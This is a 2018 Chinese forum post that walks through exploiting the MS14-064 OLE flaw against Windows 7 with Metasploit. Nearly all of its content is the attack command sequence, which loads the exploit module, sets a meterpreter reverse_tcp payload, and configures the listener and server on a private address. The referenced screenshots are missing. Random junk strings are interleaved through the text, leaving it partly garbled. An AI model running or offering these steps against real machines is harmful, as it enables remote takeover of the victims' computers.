找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1432|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

c" ?) |% N# a+ q7 [ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 7 V) N0 e7 {5 ?$ s! ^

" E- B& A6 D" _: q% R9 \3 a

- ^2 q; t9 I2 g& N 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ! W$ x5 w8 F$ t6 o8 F

; `8 z( O/ ?, v# O8 k0 s

* R! Q$ c( g1 l+ S 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp ' b, R# p9 Z6 n2 k

1 _. N1 K$ f3 [3 e# J

% k8 P+ I- d6 Y, K+ D! V             set AllowPowershellPrompt true : _6 c I: c* N

7 x* p7 h6 c, {$ Z

: e& ]. o- t- O" N# x             Set LHOST 192.168.0.109+ y, D) `3 p- N

4 O. X# k1 L; v% g" x4 @

k1 K+ `0 Y ^3 J             set SRVHOST 192.168.0.109 9 ~/ i1 O4 O; [3 R c3 O2 J* J) b

; N/ H) A/ S- a2 A% [# M

1 c4 W L/ O8 o2 p$ P9 F$ g1 x             Set uripath share' H& U3 V5 G7 y% J

* i- y* |, F1 K

& k6 U1 N. F/ V, L5 t+ {2 g2 R/ m             Set srvport 80 6 U$ E6 v. K- o5 D

; b' J9 K9 O0 n5 j

* d; n8 y, _' K$ L" M   , L& a/ _: ?) G- }

) u% s8 H, H/ ] \

1 A' ]3 [ G% \% Y5 C   $ }0 A% C* O3 C* g& i( f

- o+ G* D0 u+ c( ^ ^$ }

/ C* [8 k4 Y& e( n5 h6 ~) ^  " E) M. r2 ~: J! p9 h

3 c3 u3 M2 O/ m# k2 B, e

; ?5 q* \$ m2 W$ a6 R; ?( g3 h. a   ) A5 m3 Z& q$ \/ A& R) _# @$ t

$ q+ B8 w! [4 ?; ?5 Y8 T7 H3 k. k

" h; c! F& q7 h6 f7 ~8 k4 N: N2 v& q   4 p/ ]2 ?# f( m' X; ~

8 k, O, F1 k: D j

6 k8 G' h" x. e2 K 下面我们来访问本地地址如图: 0 l' p6 _; u1 B! G1 R. T

6 ^. {4 \5 z; N8 U/ ~* h; C

- L- n# j2 s; w/ f" n1 R \5 }# }  : K y1 i# z$ v% [

7 o( \6 e9 v5 ~ }6 U/ [7 N" Q4 M

) [. j5 d2 g7 v' b4 v% z  2 u- i! z- u" B

; X: Z6 \$ d( b, h& r" K

7 i/ [) B/ t1 l7 J: K. T : w3 U0 Q# y# c: `& x: T

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表